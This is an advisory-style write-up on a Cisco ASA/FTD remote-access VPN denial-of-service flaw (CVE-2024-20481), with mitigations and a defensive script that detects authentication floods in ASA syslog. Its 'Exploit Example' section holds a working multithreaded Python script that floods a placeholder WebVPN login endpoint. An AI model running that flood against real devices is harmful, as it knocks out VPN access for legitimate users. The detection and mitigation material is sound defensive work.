CVE-2024-20481 - Vulnerability in Cisco RAVPN Services: Denial of Service Attack Risk

A vulnerability has been identified in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software (CVE-2024-20481). It allows an unauthenticated, remote attacker to cause a denial of service (DoS) of the RAVPN service. Cisco rates the flaw Medium (CVSS 3.1 base score 5.8), but it has been exploited in the wild as a side effect of large-scale password-spraying campaigns, and CISA has added it to its Known Exploited Vulnerabilities catalog. Once the service's resources are exhausted, remote access users can no longer connect, and a reload of the device may be required to restore the RAVPN service.

Vulnerability Details

This vulnerability is due to resource exhaustion in the RAVPN service. An attacker exploits it simply by sending a large volume of VPN authentication requests to the device; the requests do not need to carry valid credentials, so ordinary brute-force or password-spray traffic is enough to trigger it. A successful attack exhausts the resources the RAVPN service depends on, so that new remote access sessions cannot be established on the affected device. Services not related to VPN are not affected.

Cisco Talos, the threat intelligence arm of Cisco Systems, has published a blog post describing large-scale brute-force attacks against VPN and SSH services that use commonly seen login credentials. That activity produces exactly the flood of authentication attempts that triggers this vulnerability. The post can be found here: Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Exploit Example

The script below illustrates the traffic pattern behind this vulnerability: many threads flood the WebVPN login endpoint with AnyConnect-style authentication POSTs. It is provided for educational purposes, to show the nature of the vulnerability rather than a refined exploit.

import random
from threading import Thread

import requests

# Target WebVPN login endpoint and the credentials sent with every request.
# Placeholders: the login does not need to succeed, the device only has to
# process each authentication attempt.
TARGET = "https://TARGET_IP/"
USERNAME = "username"
PASSWORD = "password"


def spoof_authentication_request():
    """Send one AnyConnect-style login POST with a random tunnel-group value."""
    headers = {
        "User-Agent": "AnyConnect Linux_64 4.9.05042",
        "Content-Type": "application/x-www-form-urlencoded",
    }

    # Form-encoded body mimicking the AnyConnect client's login submission
    data = (
        f"tunnel-group={random.choice(range(65535))}"
        f"&username={USERNAME}&password={PASSWORD}"
        "&url_redirect=&group_list=%22%3E%3Cgroup_list%22%2C88965"
        "&preferWebSoftwareUpgrade=&resource_url=&lang_code=en"
    )

    try:
        requests.post(TARGET, headers=headers, data=data, timeout=5)
    except requests.exceptions.RequestException:
        # Timeouts and connection errors are expected once the service degrades
        return


def exploit():
    """Loop forever, issuing authentication requests as fast as possible."""
    while True:
        spoof_authentication_request()


# 500 threads hammer the login endpoint in parallel; the threads never exit,
# so the script keeps running until it is killed.
for _ in range(500):
    t = Thread(target=exploit)
    t.start()

Mitigations and Next Steps

Cisco has released software updates that address this vulnerability for both ASA and FTD, and administrators of affected software should upgrade to a fixed release. Refer to Cisco's Security Advisory:

- Cisco Adaptive Security Appliance Software and Cisco Firepower Threat Defense Software Remote Access VPN Denial of Service Vulnerability
- Workarounds: No workarounds available

In addition to applying the fixed release, administrators should monitor VPN authentication logs for bursts of failed logins from a single source or against many different usernames, which is the signature of the brute-force and password-spray activity that triggers this condition. They should also reduce the value of such attacks by enforcing multi-factor authentication, using unique usernames and strong passwords, and restricting or rate-limiting access to the VPN login endpoint where feasible.
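As an added example of the log monitoring recommended above (this is not Cisco's tooling and not part of the original advisory), the following Python script parses ASA-style AAA rejection messages (%ASA-6-113005), counts rejections per source address in a sliding window, and flags sources that exceed a threshold. The regular expression follows Cisco's published field order for that message, but it is an assumption here: verify it against your own devices' output. The hostname fw01, the server address 10.0.0.5 and all log lines are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Pattern for an ASA-style AAA rejection syslog message (%ASA-6-113005).
# Field order follows Cisco's published message format, but is an assumption
# here: check it against real output from your own devices before relying on it.
AAA_REJECT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"%ASA-6-113005: AAA user authentication Rejected ?: reason = (?P<reason>.+?) : "
    r"server = (?P<server>\S+) : user = (?P<user>\S+) : user IP = (?P<ip>\S+)$"
)


def parse_rejects(lines, year=2024):
    """Return [(timestamp, source_ip, user)] for every AAA-reject line.

    Syslog timestamps carry no year, so the caller supplies it.
    Non-matching lines (other message IDs, malformed input) are skipped.
    """
    events = []
    for line in lines:
        m = AAA_REJECT_RE.match(line.rstrip("\n"))
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    return events


def find_floods(events, window_seconds=60, threshold=20):
    """Flag sources whose reject count in any sliding window reaches threshold.

    Returns {source_ip: (peak_count_in_window, distinct_usernames)}.
    Many distinct usernames from one source is the password-spray signature;
    one username repeated is classic brute force. Either pattern drives the
    RAVPN resource exhaustion described in the advisory.
    """
    per_ip = defaultdict(deque)   # timestamps inside the current window
    users = defaultdict(set)
    peak = {}
    for ts, ip, user in sorted(events):
        q = per_ip[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]) > timedelta(seconds=window_seconds):
            q.popleft()
        if len(q) >= threshold:
            peak[ip] = max(peak.get(ip, 0), len(q))
    return {ip: (n, len(users[ip])) for ip, n in peak.items()}


# --- Constructed sample log (not captured from a real device) -----------------
def _reject_line(ts, ip, user, reason="Invalid password"):
    return (f"{ts:%b %d %H:%M:%S} fw01 %ASA-6-113005: AAA user authentication "
            f"Rejected : reason = {reason} : server = 10.0.0.5 : user = {user} "
            f": user IP = {ip}")


def sample_log():
    t0 = datetime(2024, 10, 23, 18, 15, 11)
    lines = [
        # A legitimate user who mistyped a password twice.
        _reject_line(t0, "198.51.100.7", "alice"),
        _reject_line(t0 + timedelta(seconds=40), "198.51.100.7", "alice"),
        # An unrelated message the parser must ignore.
        f"{t0:%b %d %H:%M:%S} fw01 %ASA-6-302013: Built inbound TCP connection 1 "
        "for outside:203.0.113.9/4433 (203.0.113.9/4433) to identity:10.0.0.1/443 (10.0.0.1/443)",
    ]
    # A flood: 25 rejections from one source within 30 seconds, cycling usernames.
    for i in range(25):
        lines.append(_reject_line(t0 + timedelta(seconds=i * 1.2),
                                  "203.0.113.9", f"user{i % 8}"))
    return lines


if __name__ == "__main__":
    floods = find_floods(parse_rejects(sample_log()))
    for ip, (count, n_users) in floods.items():
        print(f"{ip}: {count} rejects in window, {n_users} distinct usernames")
```

Run against the constructed sample, only 203.0.113.9 is flagged (25 rejections, 8 usernames); the two failures from 198.51.100.7 stay below the threshold. Tune the window and threshold to your normal failed-login rate, and feed the output to a block list or a rate limiter in front of the VPN endpoint.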

Conclusion

The CVE-2024-20481 vulnerability in Cisco's RAVPN service poses a significant risk to affected devices, as it can lead to a denial of service for the VPN functionality. Ensuring that devices are updated with the latest patches and implementing proper access controls can help mitigate this risk and maintain the integrity and availability of VPN services.

Timeline

Published on: 10/23/2024 18:15:11 UTC
Last modified on: 10/29/2024 17:47:44 UTC